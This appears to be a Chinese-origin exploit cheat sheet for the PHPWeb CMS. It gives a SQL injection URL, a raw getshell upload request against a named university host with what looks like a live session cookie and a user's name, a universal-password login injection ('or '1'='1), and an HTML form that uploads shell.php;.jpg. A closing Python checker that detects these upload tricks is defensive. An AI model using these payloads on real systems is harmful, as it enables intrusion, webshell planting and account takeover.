【SQL injection】
http://www.phpweb.net/down/class/index.php?myord=1
【getshell】
POST /kedit/upload_cgi/upload.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.phpweb.net/news/admin/new ... p;pid=allpage=
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657
Content-Length: 6620

-----------------------------7db516c0118
Content-Disposition: form-data; name="fileName"

201110121318373662005.php;.jpg
-----------------------------7db516c0118
Content-Disposition: form-data; name="attachPath"

news/pics/
-----------------------------7db516c0118
Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"
Content-Type: image/gif

gif89a ');?>
【Installation files】
http://www.phpweb.com/base/install/
【Universal password】
http://www.phpweb.com/admin.php
username: admin 'or '1'='1
password: admin 'or '1'='1
【Upload vulnerability】(exp uploads shell.php.jpg):
<form name="uploadForm" style="margin:0;padding:0;" method="post" enctype="multipart/form-data" action="http://www.phpweb.com/maq/upload.php">
<input type="hidden" name="fileName" id="fileName" value="shell.php;.jpg" />
<input type="hidden" name="attachPath" id="fileName" value="maq/pics/" />
<input type="file" name="fileData" id="imgFile" size="14" style="border:1px solid #555555;">
<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="上传" style="border:1px solid #555555;background-color:#AAAAAA;" />
</form>
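
A defender-side check for the two upload requests above, as an added example that is not part of the original page or of PHPWeb's code: it parses a multipart body and flags the client-supplied fileName and attachPath fields. The boundary, the sample bodies, the extension list and all function names are constructed for illustration.

```python
import re
from email import message_from_bytes

# Constructed values: the boundary and the extension list are assumptions.
BOUNDARY = "example-boundary-7db516c0118"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
SCRIPT_EXT = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp", "cgi"}

def form_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: text value}."""
    head = b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
    fields = {}
    for part in message_from_bytes(head + body).get_payload():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_payload(decode=True).decode("latin-1").strip()
    return fields

def audit_upload(fields: dict) -> list:
    """Return findings for the client-controlled fileName / attachPath fields."""
    findings = []
    name = fields.get("fileName", "")
    path = fields.get("attachPath", "")
    # Split on '.' and ';' so "x.php;.jpg" and "x.php.jpg" both expose "php".
    tokens = [t.lower() for t in re.split(r"[.;]", name)[1:] if t]
    if any(t in SCRIPT_EXT for t in tokens):
        findings.append("script-extension-in-name")
    if re.search(r"[;\x00/\\]", name):
        findings.append("illegal-character-in-name")
    if ".." in path or ":" in path or path.startswith(("/", "\\")):
        findings.append("path-escape-in-attachPath")
    return findings

def sample_body(file_name: str, attach_path: str) -> bytes:
    """Constructed body shaped like the request above; the file part is a harmless stub."""
    out = b""
    for key, value in [("fileName", file_name), ("attachPath", attach_path), ("fileData", "GIF89a")]:
        out += (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{key}"'
                f"\r\n\r\n{value}\r\n").encode()
    return out + f"--{BOUNDARY}--\r\n".encode()

if __name__ == "__main__":
    for fn in ("201110121318373662005.php;.jpg", "shell.php.jpg", "photo.jpg"):
        print(fn, audit_upload(form_fields(CONTENT_TYPE, sample_body(fn, "news/pics/"))))
```

Flagging is only the detection half; the server-side fix is to ignore both fields and generate the stored file name and directory on the server.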